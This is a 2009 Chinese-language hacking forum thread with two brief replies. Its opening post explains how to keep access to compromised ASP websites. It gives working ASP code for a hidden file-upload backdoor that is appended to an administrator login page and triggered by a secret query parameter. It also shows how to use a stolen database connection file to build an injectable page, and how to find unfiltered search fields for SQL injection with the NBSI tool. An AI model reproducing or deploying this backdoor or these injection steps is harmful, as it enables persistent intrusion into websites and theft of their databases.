论坛风格切换
正版合作和侵权请联系 sd173@foxmail.com
 
  • 帖子
  • 日志
  • 用户
  • 版块
  • 群组
帖子
购买邀请后未收到邀请联系sdbeta@qq.com
离线惊鸿一剑
 
发帖
*
今日发帖
最后登录
1970-01-01
只看楼主 倒序阅读 使用道具 楼主  发表于: 2009-11-01 20:57:53
第一种:

是在管理员的后台登陆界面隐藏我们的后门,这是相对比较安全的
因为管理员的入口不是经常换的,只要他的登陆界面在,我们的后门就在!
当然,你也可以灵活的插入其他文件中,只要这个文件不是经常换的


1.从我们的SHELL上找到管理员的入口页面
2.编辑它   在最后面写上一段代码复制内容到剪贴板代码:
<%if request.QueryString("action")="comeon" then
a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto h,g-f-3:h.Position=0:h.type=2:h.CharSet="BIG5":i=h.Readtext:h.close:j=mid(i,InstrRev(i,"\")+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-2:h.Type=1:h.Open:c.Position=k-1:c.CopyTo h,l:h.SaveToFile server.mappath(j),2%><form enctype=multipart/form-data method=post><input type=file name=n><input type=submit></form>
<%end if%>3.那我们要怎么去找我们的后门呢?表面看是没什么区别的   这就是我们隐藏的秘诀所在复制内容到剪贴板代码:
login.asp?action=comeon出现了我们的上传页面!



第二种,比较绝了

自己构造注入点

通过conn.asp获知数据库帐户密码以后

自己构造,另一个是通过搜索查看源代码构造注入点。

这也分为几种情况来对应不同的方法


A类:
是MDB数据库那就很简单了,直接下下来就OK了


B类:
MSSQL数据库
已经获得网站的数据库链接文件,但不是SA权限

由于入侵网站并没有注入漏洞所以,无法注入,但是我们可以在本地构造一个存在注入点的文件,然后用NBSI去狂扫,就可以得出数据库的更多信息.

构造方法:
首先本地架设ASP环境,然后新建如下文件:复制内容到剪贴板代码:
<!--#include file="conn.asp"-->
<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id '如果没有这个表,可以自己建立一个表和字段
rs.open strSQL,conn,1,3
rs.close
%>注意:其中的"admin"表必须存在,所以前提该文件必须先与数据库连接上!!
完成了,就这么简单,其他的信息就让他全部自己暴露出来吧.打开nbsi,一顿狂注,什么信息都出来啦,
第二种,通过搜索构造注入点
search.asp 搜索页面,故名思意。
主要检测输入框。复制内容到剪贴板代码:
Microsoft OLE DB Provider for ODBC Drivers 岿粇 '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]︽ 1: '%'
/search.asp, 54出错,看来没过滤,接下来我们构造注入点。
注意看操作,查看源文件复制内容到剪贴板代码:
<form method=post action="search.asp" >这是一个表单以post方式提交给search.asp 的,提交的内容我们查看input,
<input type="text" size="12"
http://www.badguest.com/search.asp?searchword=test
我们构造出这样一个链接。
表示直接在网址上提交参数传递给search.asp文件。
抱歉,並沒有搜尋到相關的資料 !
表示查找test关键字,test应该是input输入的,input输入框没有过滤,所以它的内容就存在注入。
我在检查看一下这个链接。
报错,这样我们就构造出来了一个注入点,只需要放在nbsi里面去跑跑就ok了。


C类:
MSSQL数据库
已经获得网站的数据库链接文件
DB_OWNER 权限的
怎么样,接下来的差异备分等我就不演示了,这里主要讲搜索型注入。
为了便于大家理解,我再操作两个网站,不详解了。
没有过滤',我们直接查找源代码中的input构造注入点。

<form method="post" action="/search_all.asp"> 是提交给这个文件的。
<input type="text" size="14" 这是字段。,复制内容到剪贴板代码:
http://www.badguest.com/search_all.asp?keyword=teest构造后的注入点,再用nbsi去跑。 后面的不演示。
还要给大家说一种思路,就是很多管理员后台登录的地方的input输入框同样没有过滤,有时候不必去找后台密码登录,有时间可以构造一个注入点,如果是sa权限的,还用登后台吗?
离线桃花心木

发帖
14692
今日发帖
最后登录
2020-06-03
只看该作者 沙发  发表于: 2009-11-01 21:40:52
回 楼主(惊鸿一剑) 的帖子
这个不怎么懂 啊
离线quen2008
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 板凳  发表于: 2009-11-02 09:33:59
web留后门,千万不要让黑客利用了